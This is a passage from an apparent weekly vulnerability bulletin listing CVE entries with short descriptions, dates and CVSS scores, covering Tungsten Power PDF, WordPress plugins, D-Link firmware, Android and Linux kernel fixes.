Tungsten Automation Power PDF PDF File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tungsten Automation Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24457. | 2024-11-22 | 7.8 | CVE-2024-9741 |
| tungstenautomation -- power_pdf |
Tungsten Automation Power PDF PSD File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tungsten Automation Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PSD files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24458. | 2024-11-22 | 7.8 | CVE-2024-9742 |
| tungstenautomation -- power_pdf |
Tungsten Automation Power PDF PDF File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tungsten Automation Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24459. | 2024-11-22 | 7.8 | CVE-2024-9743 |
| tungstenautomation -- power_pdf |
Tungsten Automation Power PDF JP2 File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tungsten Automation Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JP2 files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24460. | 2024-11-22 | 7.8 | CVE-2024-9744 |
| tungstenautomation -- power_pdf |
Tungsten Automation Power PDF TIF File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tungsten Automation Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of TIF files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24461. | 2024-11-22 | 7.8 | CVE-2024-9745 |
| tungstenautomation -- power_pdf |
Tungsten Automation Power PDF TGA File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tungsten Automation Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of TGA files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24462. | 2024-11-22 | 7.8 | CVE-2024-9746 |
| tungstenautomation -- power_pdf |
Tungsten Automation Power PDF PSD File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tungsten Automation Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PSD files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24463. | 2024-11-22 | 7.8 | CVE-2024-9747 |
| tungstenautomation -- power_pdf |
Tungsten Automation Power PDF XPS File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tungsten Automation Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of XPS files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24464. | 2024-11-22 | 7.8 | CVE-2024-9748 |
| tungstenautomation -- power_pdf |
Tungsten Automation Power PDF PNG File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tungsten Automation Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PNG files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24466. | 2024-11-22 | 7.8 | CVE-2024-9750 |
| vivwebsolutions -- dynamic_widgets |
Cross-Site Request Forgery (CSRF) vulnerability in Vivwebs Dynamic Widgets.This issue affects Dynamic Widgets: from n/a through 1.6.4. | 2024-11-19 | 8.8 | CVE-2024-51669 |
| vollstart -- event_tickets_with_ticket_scanner |
Improper Neutralization of Special Elements Used in a Template Engine vulnerability in Saso Nikolov Event Tickets with Ticket Scanner allows Server Side Include (SSI) Injection.This issue affects Event Tickets with Ticket Scanner: from n/a through 2.3.11. | 2024-11-18 | 8.8 | CVE-2024-52427 |
| wpdownloadmanager -- premium_packages_-_sell_digital_products_securely |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in W3 Eden, Inc. Premium Packages allows SQL Injection.This issue affects Premium Packages: from n/a through 5.9.3. | 2024-11-18 | 7.2 | CVE-2024-52435 |
| wpexperts -- post_smtp |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Post SMTP allows Blind SQL Injection.This issue affects Post SMTP: from n/a through 2.9.9. | 2024-11-18 | 7.2 | CVE-2024-52436 |
| zohocorp -- manageengine_adaudit_plus |
Zohocorp ManageEngine ADAudit Plus versions below 8123 are vulnerable to SQL Injection in the reports module. | 2024-11-18 | 8.8 | CVE-2024-49574 |
| zte -- nh8091_firmware |
ZTE NH8091 product has an improper permission control vulnerability. Due to improper permission control of the Web module interface, an authenticated attacker may exploit the vulnerability to execute arbitrary commands. | 2024-11-18 | 8.8 | CVE-2024-22067 |
Medium Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| 115cms -- 115cms |
A vulnerability was found in 115cms up to 20240807 and classified as problematic. This issue affects some unknown processing of the file /app/admin/view/web_user.html. The manipulation of the argument ks leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-11-20 | 6.1 | CVE-2024-11488 |
| 115cms -- 115cms |
A vulnerability was found in 115cms up to 20240807. It has been classified as problematic. Affected is an unknown function of the file /index.php/admin/web/file.html. The manipulation of the argument ks leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-11-20 | 6.1 | CVE-2024-11489 |
| 115cms -- 115cms |
A vulnerability was found in 115cms up to 20240807. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /index.php/admin/web/set.html. The manipulation of the argument type leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-11-20 | 6.1 | CVE-2024-11490 |
| 115cms -- 115cms |
A vulnerability classified as problematic has been found in 115cms up to 20240807. This affects an unknown part of the file /index.php/admin/web/appurladd.html. The manipulation of the argument tid leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-11-20 | 6.1 | CVE-2024-11492 |
| 115cms -- 115cms |
A vulnerability classified as problematic was found in 115cms up to 20240807. This vulnerability affects unknown code of the file /index.php/setpage/admin/pageAE.html. The manipulation of the argument tid leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-11-20 | 6.1 | CVE-2024-11493 |
| cesanta -- mongoose |
Use of Out-of-range Pointer Offset vulnerability in Cesanta Mongoose Web Server v7.14 allows an attacker to send an unexpected TLS packet and force the application to read unintended heap memory space. | 2024-11-18 | 5.3 | CVE-2024-42387 |
| cesanta -- mongoose |
Use of Out-of-range Pointer Offset vulnerability in Cesanta Mongoose Web Server v7.14 allows an attacker to send an unexpected TLS packet and force the application to read unintended heap memory space. | 2024-11-18 | 5.3 | CVE-2024-42388 |
| cesanta -- mongoose |
Use of Out-of-range Pointer Offset vulnerability in Cesanta Mongoose Web Server v7.14 allows an attacker to send an unexpected TLS packet and force the application to read unintended heap memory space. | 2024-11-18 | 5.3 | CVE-2024-42389 |
| cesanta -- mongoose |
Use of Out-of-range Pointer Offset vulnerability in Cesanta Mongoose Web Server v7.14 allows an attacker to send an unexpected TLS packet and force the application to read unintended heap memory space. | 2024-11-18 | 5.3 | CVE-2024-42390 |
| cesanta -- mongoose |
Use of Out-of-range Pointer Offset vulnerability in Cesanta Mongoose Web Server v7.14 allows an attacker to send an unexpected TLS packet and force the application to read unintended heap memory space. | 2024-11-18 | 5.3 | CVE-2024-42391 |
| code4berry -- decoration_management_system |
A vulnerability, which was classified as problematic, was found in Code4Berry Decoration Management System 1.0. This affects an unknown part of the file /decoration/admin/user_permission.php of the component User Permission Handler. The manipulation leads to permission issues. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-11-20 | 4.3 | CVE-2024-11486 |
| django-cms -- django_cms |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in django CMS Association django-cms allows Cross-Site Scripting (XSS).This issue affects django-cms: 3.11.7, 3.11.8, 4.1.2, 4.1.3. | 2024-11-18 | 4.8 | CVE-2024-11319 |
| dlink -- di-8003_firmware |
D-LINK DI-8003 v16.07.16A1 was discovered to contain a buffer overflow via the fn parameter in the tgfile_htm function. | 2024-11-20 | 4.9 | CVE-2024-52754 |
| dlink -- di-8003_firmware |
D-LINK DI-8003 v16.07.26A1 was discovered to contain a buffer overflow via the host_ip parameter in the ipsec_road_asp function. | 2024-11-21 | 4.9 | CVE-2024-52755 |
| dlink -- di-8003_firmware |
D-LINK DI-8003 v16.07.16A1 was discovered to contain a buffer overflow via the notify parameter in the arp_sys_asp function. | 2024-11-20 | 4.9 | CVE-2024-52757 |
| f4dev -- f4_improvements |
The F4 Improvements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.9.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. | 2024-11-21 | 5.4 | CVE-2024-9442 |
| fedoralovespython -- lxml_html_clean |
lxml_html_clean is a project for HTML cleaning functionalities copied from `lxml.html.clean`. Prior to version 0.4.0, the HTML Parser in lxml does not properly handle context-switching for special HTML tags such as `<svg>`, `<math>` and `<noscript>`. This behavior deviates from how web browsers parse and interpret such tags. Specifically, content in CSS comments is ignored by lxml_html_clean but may be interpreted differently by web browsers, enabling malicious scripts to bypass the cleaning process. This vulnerability could lead to Cross-Site Scripting (XSS) attacks, compromising the security of users relying on lxml_html_clean in default configuration for sanitizing untrusted HTML content. Users employing the HTML cleaner in a security-sensitive context should upgrade to lxml 0.4.0, which addresses this issue. As a temporary mitigation, users can configure lxml_html_clean with the following settings to prevent the exploitation of this vulnerability. Via `remove_tags`, one may specify tags to remove - their content is moved to their parents' tags. Via `kill_tags`, one may specify tags to be removed completely. Via `allow_tags`, one may restrict the set of permissible tags, excluding context-switching tags like `<svg>`, `<math>` and `<noscript>`. | 2024-11-19 | 6.1 | CVE-2024-52595 |
| google -- android |
In SMF_ParseMetaEvent of eas_smf.c, there is a possible integer overflow. This could lead to remote denial of service due to resource exhaustion with no additional execution privileges needed. User interaction is needed for exploitation. | 2024-11-19 | 6.5 | CVE-2018-9348 |
| google -- android |
In parse of M3UParser.cpp there is a possible resource exhaustion due to improper input validation. This could lead to denial of service with no additional execution privileges needed. User interaction is needed for exploitation. | 2024-11-19 | 6.5 | CVE-2018-9440 |
| google -- android |
In the Mediatek Preloader, there are out of bounds reads and writes due to an exposed interface that allows arbitrary peripheral memory mapping with insufficient blacklisting/whitelisting. This could lead to local elevation of privilege, given physical access to the device with no additional execution privileges needed. User interaction is needed for exploitation. | 2024-11-19 | 6.4 | CVE-2018-9371 |
| google -- android |
In ResStringPool::setTo of ResourceTypes.cpp, it's possible for an attacker to control the value of mStringPoolSize to be out of bounds, causing information disclosure. | 2024-11-19 | 5.5 | CVE-2018-9340 |
| google -- android |
In BnAudioPolicyService::onTransact of AudioPolicyService.cpp, there is a possible information disclosure due to uninitialized data. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-11-19 | 5.5 | CVE-2018-9345 |
| google -- android |
In BnAudioPolicyService::onTransact of AudioPolicyService.cpp, there is a possible information disclosure due to uninitialized data. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-11-19 | 5.5 | CVE-2018-9346 |
| google -- android |
In analyzeAxes of FontUtils.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-11-19 | 5.5 | CVE-2018-9410 |
| google -- android |
In removeUnsynchronization of ID3.cpp there is a possible resource exhaustion due to improper input validation. This could lead to denial of service with no additional execution privileges needed. User interaction is needed for exploitation. | 2024-11-19 | 5.5 | CVE-2018-9412 |
| google -- android |
In BnCameraService::onTransact of CameraService.cpp, there is a possible information disclosure due to uninitialized data. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-11-19 | 5.5 | CVE-2018-9420 |
| google -- android |
In writeInplace of Parcel.cpp, there is a possible information leak across processes, using Binder, due to uninitialized data. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-11-19 | 5.5 | CVE-2018-9421 |
| hyscaler -- wp_roles_at_registration |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in NetTantra WP Roles at Registration allows Stored XSS.This issue affects WP Roles at Registration: from n/a through 0.23. | 2024-11-19 | 4.8 | CVE-2023-27609 |
| idccms -- idccms |
A vulnerability was found in idcCMS 1.60. It has been classified as problematic. This affects the function GetCityOptionJs of the file /inc/classProvCity.php. The manipulation of the argument idName leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-11-21 | 6.1 | CVE-2024-11587 |
| inspireui -- mstore_api |
The MStore API - Create Native Android & iOS Apps On The Cloud plugin for WordPress is vulnerable to SQL Injection via the 'status_type' parameter in all versions up to, and including, 4.15.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2024-11-20 | 6.5 | CVE-2024-11179 |
| lightspeedwp -- lsx_tour_operator |
The LSX Tour Operator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.4.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. | 2024-11-21 | 5.4 | CVE-2024-9851 |
| linear -- linear |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Linear Oy Linear linear allows DOM-Based XSS.This issue affects Linear: from n/a through 2.7.11. | 2024-11-18 | 5.4 | CVE-2024-52426 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: ocfs2: remove entry once instead of null-ptr-dereference in ocfs2_xa_remove() Syzkaller is able to provoke null-ptr-dereference in ocfs2_xa_remove(): [ 57.319872] (a.out,1161,7):ocfs2_xa_remove:2028 ERROR: status = -12 [ 57.320420] (a.out,1161,7):ocfs2_xa_cleanup_value_truncate:1999 ERROR: Partial truncate while removing xattr overlay.upper. Leaking 1 clusters and removing the entry [ 57.321727] BUG: kernel NULL pointer dereference, address: 0000000000000004 [...] [ 57.325727] RIP: 0010:ocfs2_xa_block_wipe_namevalue+0x2a/0xc0 [...] [ 57.331328] Call Trace: [ 57.331477] <TASK> [...] [ 57.333511] ? do_user_addr_fault+0x3e5/0x740 [ 57.333778] ? exc_page_fault+0x70/0x170 [ 57.334016] ? asm_exc_page_fault+0x2b/0x30 [ 57.334263] ? __pfx_ocfs2_xa_block_wipe_namevalue+0x10/0x10 [ 57.334596] ? ocfs2_xa_block_wipe_namevalue+0x2a/0xc0 [ 57.334913] ocfs2_xa_remove_entry+0x23/0xc0 [ 57.335164] ocfs2_xa_set+0x704/0xcf0 [ 57.335381] ? _raw_spin_unlock+0x1a/0x40 [ 57.335620] ? ocfs2_inode_cache_unlock+0x16/0x20 [ 57.335915] ? trace_preempt_on+0x1e/0x70 [ 57.336153] ? start_this_handle+0x16c/0x500 [ 57.336410] ? preempt_count_sub+0x50/0x80 [ 57.336656] ? _raw_read_unlock+0x20/0x40 [ 57.336906] ? start_this_handle+0x16c/0x500 [ 57.337162] ocfs2_xattr_block_set+0xa6/0x1e0 [ 57.337424] __ocfs2_xattr_set_handle+0x1fd/0x5d0 [ 57.337706] ? ocfs2_start_trans+0x13d/0x290 [ 57.337971] ocfs2_xattr_set+0xb13/0xfb0 [ 57.338207] ? dput+0x46/0x1c0 [ 57.338393] ocfs2_xattr_trusted_set+0x28/0x30 [ 57.338665] ? ocfs2_xattr_trusted_set+0x28/0x30 [ 57.338948] __vfs_removexattr+0x92/0xc0 [ 57.339182] __vfs_removexattr_locked+0xd5/0x190 [ 57.339456] ? preempt_count_sub+0x50/0x80 [ 57.339705] vfs_removexattr+0x5f/0x100 [...] Reproducer uses faultinject facility to fail ocfs2_xa_remove() -> ocfs2_xa_value_truncate() with -ENOMEM. In this case the comment mentions that we can return 0 if ocfs2_xa_cleanup_value_truncate() is going to wipe the entry anyway. But the following 'rc' check is wrong and execution flow do 'ocfs2_xa_remove_entry(loc);' twice: * 1st: in ocfs2_xa_cleanup_value_truncate(); * 2nd: returning back to ocfs2_xa_remove() instead of going to 'out'. Fix this by skipping the 2nd removal of the same entry and making syzkaller repro happy. | 2024-11-19 | 5.5 | CVE-2024-50265 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: clk: qcom: videocc-sm8350: use HW_CTRL_TRIGGER for vcodec GDSCs A recent change in the venus driver results in a stuck clock on the Lenovo ThinkPad X13s, for example, when streaming video in firefox: video_cc_mvs0_clk status stuck at 'off' WARNING: CPU: 6 PID: 2885 at drivers/clk/qcom/clk-branch.c:87 clk_branch_wait+0x144/0x15c ... Call trace: clk_branch_wait+0x144/0x15c clk_branch2_enable+0x30/0x40 clk_core_enable+0xd8/0x29c clk_enable+0x2c/0x4c vcodec_clks_enable.isra.0+0x94/0xd8 [venus_core] coreid_power_v4+0x464/0x628 [venus_core] vdec_start_streaming+0xc4/0x510 [venus_dec] vb2_start_streaming+0x6c/0x180 [videobuf2_common] vb2_core_streamon+0x120/0x1dc [videobuf2_common] vb2_streamon+0x1c/0x6c [videobuf2_v4l2] v4l2_m2m_ioctl_streamon+0x30/0x80 [v4l2_mem2mem] v4l_streamon+0x24/0x30 [videodev] using the out-of-tree sm8350/sc8280xp venus support. [1] Update also the sm8350/sc8280xp GDSC definitions so that the hw control mode can be changed at runtime as the venus driver now requires. | 2024-11-19 | 5.5 | CVE-2024-50266 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: KEYS: trusted: dcp: fix NULL dereference in AEAD crypto operation When sealing or unsealing a key blob we currently do not wait for the AEAD cipher operation to finish and simply return after submitting the request. If there is some load on the system we can exit before the cipher operation is done and the buffer we read from/write to is already removed from the stack. This will e.g. result in NULL pointer dereference errors in the DCP driver during blob creation. Fix this by waiting for the AEAD cipher operation to finish before resuming the seal and unseal calls. | 2024-11-19 | 5.5 | CVE-2024-50281 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: media: v4l2-tpg: prevent the risk of a division by zero As reported by Coverity, the logic at tpg_precalculate_line() blindly rescales the buffer even when scaled_witdh is equal to zero. If this ever happens, this will cause a division by zero. Instead, add a WARN_ON_ONCE() to trigger such cases and return without doing any precalculation. | 2024-11-19 | 5.5 | CVE-2024-50287 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: sctp: properly validate chunk size in sctp_sf_ootb() A size validation fix similar to that in Commit 50619dbf8db7 ("sctp: add size validation when walking chunks") is also required in sctp_sf_ootb() to address a crash reported by syzbot: BUG: KMSAN: uninit-value in sctp_sf_ootb+0x7f5/0xce0 net/sctp/sm_statefuns.c:3712 sctp_sf_ootb+0x7f5/0xce0 net/sctp/sm_statefuns.c:3712 sctp_do_sm+0x181/0x93d0 net/sctp/sm_sideeffect.c:1166 sctp_endpoint_bh_rcv+0xc38/0xf90 net/sctp/endpointola.c:407 sctp_inq_push+0x2ef/0x380 net/sctp/inqueue.c:88 sctp_rcv+0x3831/0x3b20 net/sctp/input.c:243 sctp4_rcv+0x42/0x50 net/sctp/protocol.c:1159 ip_protocol_deliver_rcu+0xb51/0x13d0 net/ipv4/ip_input.c:205 ip_local_deliver_finish+0x336/0x500 net/ipv4/ip_input.c:233 | 2024-11-19 | 5.5 | CVE-2024-50299 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: regulator: rtq2208: Fix uninitialized use of regulator_config Fix rtq2208 driver uninitialized use to cause kernel error. | 2024-11-19 | 5.5 | CVE-2024-50300 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: mctp i2c: handle NULL header address daddr can be NULL if there is no neighbour table entry present, in that case the tx packet should be dropped. saddr will usually be set by MCTP core, but check for NULL in case a packet is transmitted by a different protocol. | 2024-11-19 | 5.5 | CVE-2024-53043 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: slub/kunit: fix a WARNING due to unwrapped __kmalloc_cache_noprof 'modprobe slub_kunit' will have a warning as shown below. The root cause is that __kmalloc_cache_noprof was directly used, which resulted in no alloc_tag being allocated. This caused current->alloc_tag to be null, leading to a warning in alloc_tag_add_check. Let's add an alloc_hook layer to __kmalloc_cache_noprof specifically within lib/slub_kunit.c, which is the only user of this internal slub function outside kmalloc implementation itself. [58162.947016] WARNING: CPU: 2 PID: 6210 at ./include/linux/alloc_tag.h:125 alloc_tagging_slab_alloc_hook+0x268/0x27c [58162.957721] Call trace: [58162.957919] alloc_tagging_slab_alloc_hook+0x268/0x27c [58162.958286] __kmalloc_cache_noprof+0x14c/0x344 [58162.958615] test_kmalloc_redzone_access+0x50/0x10c [slub_kunit] [58162.959045] kunit_try_run_case+0x74/0x184 [kunit] [58162.959401] kunit_generic_run_threadfn_adapter+0x2c/0x4c [kunit] [58162.959841] kthread+0x10c/0x118 [58162.960093] ret_from_fork+0x10/0x20 [58162.960363] ---[ end trace 0000000000000000 ]--- | 2024-11-19 | 5.5 | CVE-2024-53049 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: drm/i915/hdcp: Add encoder check in hdcp2_get_capability Add encoder check in intel_hdcp2_get_capability to avoid null pointer error. | 2024-11-19 | 5.5 | CVE-2024-53050 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: drm/i915/hdcp: Add encoder check in intel_hdcp_get_capability Sometimes during hotplug scenario or suspend/resume scenario encoder is not always initialized when intel_hdcp_get_capability add a check to avoid kernel null pointer dereference. | 2024-11-19 | 5.5 | CVE-2024-53051 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: scsi: ufs: core: Fix another deadlock during RTC update If ufshcd_rtc_work calls ufshcd_rpm_put_sync() and the pm's usage_count is 0, we will enter the runtime suspend callback. However, the runtime suspend callback will wait to flush ufshcd_rtc_work, causing a deadlock. Replace ufshcd_rpm_put_sync() with ufshcd_rpm_put() to avoid the deadlock. | 2024-11-19 | 5.5 | CVE-2024-53053 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: cgroup/bpf: use a dedicated workqueue for cgroup bpf destruction A hung_task problem shown below was found: INFO: task kworker/0:0:8 blocked for more than 327 seconds. "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. Workqueue: events cgroup_bpf_release Call Trace: <TASK> __schedule+0x5a2/0x2050 ? find_held_lock+0x33/0x100 ? wq_worker_sleeping+0x9e/0xe0 schedule+0x9f/0x180 schedule_preempt_disabled+0x25/0x50 __mutex_lock+0x512/0x740 ? cgroup_bpf_release+0x1e/0x4d0 ? cgroup_bpf_release+0xcf/0x4d0 ? process_scheduled_works+0x161/0x8a0 ? cgroup_bpf_release+0x1e/0x4d0 ? mutex_lock_nested+0x2b/0x40 ? __pfx_delay_tsc+0x10/0x10 mutex_lock_nested+0x2b/0x40 cgroup_bpf_release+0xcf/0x4d0 ? process_scheduled_works+0x161/0x8a0 ? trace_event_raw_event_workqueue_execute_start+0x64/0xd0 ? process_scheduled_works+0x161/0x8a0 process_scheduled_works+0x23a/0x8a0 worker_thread+0x231/0x5b0 ? __pfx_worker_thread+0x10/0x10 kthread+0x14d/0x1c0 ? __pfx_kthread+0x10/0x10 ret_from_fork+0x59/0x70 ? __pfx_kthread+0x10/0x10 ret_from_fork_asm+0x1b/0x30 </TASK> This issue can be reproduced by the following pressuse test: 1. A large number of cpuset cgroups are deleted. 2. Set cpu on and off repeatly. 3. Set watchdog_thresh repeatly. The scripts can be obtained at LINK mentioned above the signature. The reason for this issue is cgroup_mutex and cpu_hotplug_lock are acquired in different tasks, which may lead to deadlock. It can lead to a deadlock through the following steps: 1. A large number of cpusets are deleted asynchronously, which puts a large number of cgroup_bpf_release works into system_wq. The max_active of system_wq is WQ_DFL_ACTIVE(256). Consequently, all active works are cgroup_bpf_release works, and many cgroup_bpf_release works will be put into inactive queue. As illustrated in the diagram, there are 256 (in the acvtive queue) + n (in the inactive queue) works. 2. Setting watchdog_thresh will hold cpu_hotplug_lock.read and put smp_call_on_cpu work into system_wq. However step 1 has already filled system_wq, 'sscs.work' is put into inactive queue. 'sscs.work' has to wait until the works that were put into the inacvtive queue earlier have executed (n cgroup_bpf_release), so it will be blocked for a while. 3. Cpu offline requires cpu_hotplug_lock.write, which is blocked by step 2. 4. Cpusets that were deleted at step 1 put cgroup_release works into cgroup_destroy_wq. They are competing to get cgroup_mutex all the time. When cgroup_metux is acqured by work at css_killed_work_fn, it will call cpuset_css_offline, which needs to acqure cpu_hotplug_lock.read. However, cpuset_css_offline will be blocked for step 3. 5. At this moment, there are 256 works in active queue that are cgroup_bpf_release, they are attempting to acquire cgroup_mutex, and as a result, all of them are blocked. Consequently, sscs.work can not be executed. Ultimately, this situation leads to four processes being blocked, forming a deadlock. system_wq(step1) WatchDog(step2) cpu offline(step3) cgroup_destroy_wq(step4) ... 2000+ cgroups deleted asyn 256 actives + n inactives __lockup_detector_reconfigure P(cpu_hotplug_lock.read) put sscs.work into system_wq 256 + n + 1(sscs.work) sscs.work wait to be executed warting sscs.work finish percpu_down_write P(cpu_hotplug_lock.write) ...blocking... css_killed_work_fn P(cgroup_mutex) cpuset_css_offline P(cpu_hotplug_lock.read) ...blocking... 256 cgroup_bpf_release mutex_lock(&cgroup_mutex); ..blocking... To fix the problem, place cgroup_bpf_release works on a dedicated workqueue which can break the loop and solve the problem. System wqs are for misc things which shouldn't create a large number of concurrent work items. If something is going to generate > ---truncated--- | 2024-11-19 | 5.5 | CVE-2024-53054 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: wifi: iwlwifi: mvm: fix 6 GHz scan construction If more than 255 colocated APs exist for the set of all APs found during 2.4/5 GHz scanning, then the 6 GHz scan construction will loop forever since the loop variable has type u8, which can never reach the number found when that's bigger than 255, and is stored in a u32 variable. Also move it into the loops to have a smaller scope. Using a u32 there is fine, we limit the number of APs in the scan list and each has a limit on the number of RNR entries due to the frame size. With a limit of 1000 scan results, a frame size upper bound of 4096 (really it's more like ~2300) and a TBTT entry size of at least 11, we get an upper bound for the number of ~372k, well in the bounds of a u32. | 2024-11-19 | 5.5 | CVE-2024-53055 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: drm/mediatek: Fix potential NULL dereference in mtk_crtc_destroy() In mtk_crtc_create(), if the call to mbox_request_channel() fails then we set the "mtk_crtc->cmdq_client.chan" pointer to NULL. In that situation, we do not call cmdq_pkt_create(). During the cleanup, we need to check if the "mtk_crtc->cmdq_client.chan" is NULL first before calling cmdq_pkt_destroy(). Calling cmdq_pkt_destroy() is unnecessary if we didn't call cmdq_pkt_create() and it will result in a NULL pointer dereference. | 2024-11-19 | 5.5 | CVE-2024-53056 |
| linux -- linux_kernel |
